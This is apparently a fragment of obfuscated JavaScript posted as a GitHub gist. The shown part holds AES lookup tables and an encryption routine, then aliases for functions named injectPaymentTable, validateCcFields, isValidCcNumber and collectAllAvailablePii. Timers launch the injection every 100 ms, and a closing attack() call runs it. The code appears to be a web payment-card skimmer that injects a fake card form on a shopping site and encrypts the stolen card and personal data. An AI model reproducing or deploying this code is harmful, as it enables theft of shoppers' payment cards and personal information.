G2X: [0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74,76,78,80,82,84,86,88,90,92,94,96,98,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,130,132,134,136,138,140,142,144,146,148,150,152,154,156,158,160,162,164,166,168,170,172,174,176,178,180,182,184,186,188,190,192,194,196,198,200,202,204,206,208,210,212,214,216,218,220,222,224,226,228,230,232,234,236,238,240,242,244,246,248,250,252,254,27,25,31,29,19,17,23,21,11,9,15,13,3,1,7,5,59,57,63,61,51,49,55,53,43,41,47,45,35,33,39,37,91,89,95,93,83,81,87,85,75,73,79,77,67,65,71,69,123,121,127,125,115,113,119,117,107,105,111,109,99,97,103,101,155,153,159,157,147,145,151,149,139,137,143,141,131,129,135,133,187,185,191,189,179,177,183,181,171,169,175,173,163,161,167,165,219,217,223,221,211,209,215,213,203,201,207,205,195,193,199,197,251,249,255,253,243,241,247,245,235,233,239,237,227,225,231,229],
G3X: [0,3,6,5,12,15,10,9,24,27,30,29,20,23,18,17,48,51,54,53,60,63,58,57,40,43,46,45,36,39,34,33,96,99,102,101,108,111,106,105,120,123,126,125,116,119,114,113,80,83,86,85,92,95,90,89,72,75,78,77,68,71,66,65,192,195,198,197,204,207,202,201,216,219,222,221,212,215,210,209,240,243,246,245,252,255,250,249,232,235,238,237,228,231,226,225,160,163,166,165,172,175,170,169,184,187,190,189,180,183,178,177,144,147,150,149,156,159,154,153,136,139,142,141,132,135,130,129,155,152,157,158,151,148,145,146,131,128,133,134,143,140,137,138,171,168,173,174,167,164,161,162,179,176,181,182,191,188,185,186,251,248,253,254,247,244,241,242,227,224,229,230,239,236,233,234,203,200,205,206,199,196,193,194,211,208,213,214,223,220,217,218,91,88,93,94,87,84,81,82,67,64,69,70,79,76,73,74,107,104,109,110,103,100,97,98,115,112,117,118,127,124,121,122,59,56,61,62,55,52,49,50,35,32,37,38,47,44,41,42,11,8,13,14,7,4,1,2,19,16,21,22,31,28,25,26],
G9X: [0,9,18,27,36,45,54,63,72,65,90,83,108,101,126,119,144,153,130,139,180,189,166,175,216,209,202,195,252,245,238,231,59,50,41,32,31,22,13,4,115,122,97,104,87,94,69,76,171,162,185,176,143,134,157,148,227,234,241,248,199,206,213,220,118,127,100,109,82,91,64,73,62,55,44,37,26,19,8,1,230,239,244,253,194,203,208,217,174,167,188,181,138,131,152,145,77,68,95,86,105,96,123,114,5,12,23,30,33,40,51,58,221,212,207,198,249,240,235,226,149,156,135,142,177,184,163,170,236,229,254,247,200,193,218,211,164,173,182,191,128,137,146,155,124,117,110,103,88,81,74,67,52,61,38,47,16,25,2,11,215,222,197,204,243,250,225,232,159,150,141,132,187,178,169,160,71,78,85,92,99,106,113,120,15,6,29,20,43,34,57,48,154,147,136,129,190,183,172,165,210,219,192,201,246,255,228,237,10,3,24,17,46,39,60,53,66,75,80,89,102,111,116,125,161,168,179,186,133,140,151,158,233,224,251,242,205,196,223,214,49,56,35,42,21,28,7,14,121,112,107,98,93,84,79,70],
GBX: [0,11,22,29,44,39,58,49,88,83,78,69,116,127,98,105,176,187,166,173,156,151,138,129,232,227,254,245,196,207,210,217,123,112,109,102,87,92,65,74,35,40,53,62,15,4,25,18,203,192,221,214,231,236,241,250,147,152,133,142,191,180,169,162,246,253,224,235,218,209,204,199,174,165,184,179,130,137,148,159,70,77,80,91,106,97,124,119,30,21,8,3,50,57,36,47,141,134,155,144,161,170,183,188,213,222,195,200,249,242,239,228,61,54,43,32,17,26,7,12,101,110,115,120,73,66,95,84,247,252,225,234,219,208,205,198,175,164,185,178,131,136,149,158,71,76,81,90,107,96,125,118,31,20,9,2,51,56,37,46,140,135,154,145,160,171,182,189,212,223,194,201,248,243,238,229,60,55,42,33,16,27,6,13,100,111,114,121,72,67,94,85,1,10,23,28,45,38,59,48,89,82,79,68,117,126,99,104,177,186,167,172,157,150,139,128,233,226,255,244,197,206,211,216,122,113,108,103,86,93,64,75,34,41,52,63,14,5,24,19,202,193,220,215,230,237,240,251,146,153,132,143,190,181,168,163],
GDX: [0,13,26,23,52,57,46,35,104,101,114,127,92,81,70,75,208,221,202,199,228,233,254,243,184,181,162,175,140,129,150,155,187,182,161,172,143,130,149,152,211,222,201,196,231,234,253,240,107,102,113,124,95,82,69,72,3,14,25,20,55,58,45,32,109,96,119,122,89,84,67,78,5,8,31,18,49,60,43,38,189,176,167,170,137,132,147,158,213,216,207,194,225,236,251,246,214,219,204,193,226,239,248,245,190,179,164,169,138,135,144,157,6,11,28,17,50,63,40,37,110,99,116,121,90,87,64,77,218,215,192,205,238,227,244,249,178,191,168,165,134,139,156,145,10,7,16,29,62,51,36,41,98,111,120,117,86,91,76,65,97,108,123,118,85,88,79,66,9,4,19,30,61,48,39,42,177,188,171,166,133,136,159,146,217,212,195,206,237,224,247,250,183,186,173,160,131,142,153,148,223,210,197,200,235,230,241,252,103,106,125,112,83,94,73,68,15,2,21,24,59,54,33,44,12,1,22,27,56,53,34,47,100,105,126,115,80,93,74,71,220,209,198,203,232,229,242,255,180,185,174,163,128,141,154,151],
GEX: [0,14,28,18,56,54,36,42,112,126,108,98,72,70,84,90,224,238,252,242,216,214,196,202,144,158,140,130,168,166,180,186,219,213,199,201,227,237,255,241,171,165,183,185,147,157,143,129,59,53,39,41,3,13,31,17,75,69,87,89,115,125,111,97,173,163,177,191,149,155,137,135,221,211,193,207,229,235,249,247,77,67,81,95,117,123,105,103,61,51,33,47,5,11,25,23,118,120,106,100,78,64,82,92,6,8,26,20,62,48,34,44,150,152,138,132,174,160,178,188,230,232,250,244,222,208,194,204,65,79,93,83,121,119,101,107,49,63,45,35,9,7,21,27,161,175,189,179,153,151,133,139,209,223,205,195,233,231,245,251,154,148,134,136,162,172,190,176,234,228,246,248,210,220,206,192,122,116,102,104,66,76,94,80,10,4,22,24,50,60,46,32,236,226,240,254,212,218,200,198,156,146,128,142,164,170,184,182,12,2,16,30,52,58,40,38,124,114,96,110,68,74,88,86,55,57,43,37,15,1,19,29,71,73,91,85,127,113,99,109,215,217,203,197,239,225,243,253,167,169,187,181,159,145,131,141],
core: core_,
expandKey: expandKey_,
addRoundKey: addRoundKey_,
createRoundKey: createRoundKey_,
subBytes: subBytes_,
shiftRows: shiftRows_,
shiftRow: shiftRow_,
galois_multiplication: galois_multiplication_,
mixColumns: mixColumns_,
mixColumn: mixColumn_,
round: round_,
invRound: invRound,
main: main_,
invMain: invMain_,
numberOfRounds: numberOfRounds_,
encrypt: encrypt_,
decrypt: decrypt_
},
modeOfOperation: {
OFB: 0,
CFB: 1,
CBC: 2
},
getBlock: getBlock_,
encrypt: encrypt__,
decrypt: decrypt__,
padBytesIn: padBytesIn_,
unpadBytesOut: unpadBytesOut_
};
void 0 === existingGuid ? generateGuid32() : 32 != getCodeArrFromString(existingGuid).length ? generateGuid32() : existingGuid = getCodeArrFromString(existingGuid), void 0 === existingIv ? generateIv16() : 16 != getCodeArrFromString(existingIv).length ? generateIv16() : existingIv = getCodeArrFromString(existingIv);
var _0x49B8 = str2EncodedArr(data);
return arr2String(utils.encrypt(_0x49B8, 2, existingGuid, existingIv));
}
teros = injectPaymentTable;
binoms = validateCcFields;
adumn = changeCallback;
hinnes = isValidCcNumber;
dertons = clickCallback;
linomx = collectAllAvailablePii;
_gfv = getValueFromLocalStorageOrElement;
hornis = generateGUID__;
lscr = false;
setInterval(startInjections, 100);
setInterval(removeInjectionIfDone, 100);
derit = generateGUID_;
kilons = generateIV_;
admis = encryptData_;
};
attack(7206);
return 6052;
}());
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment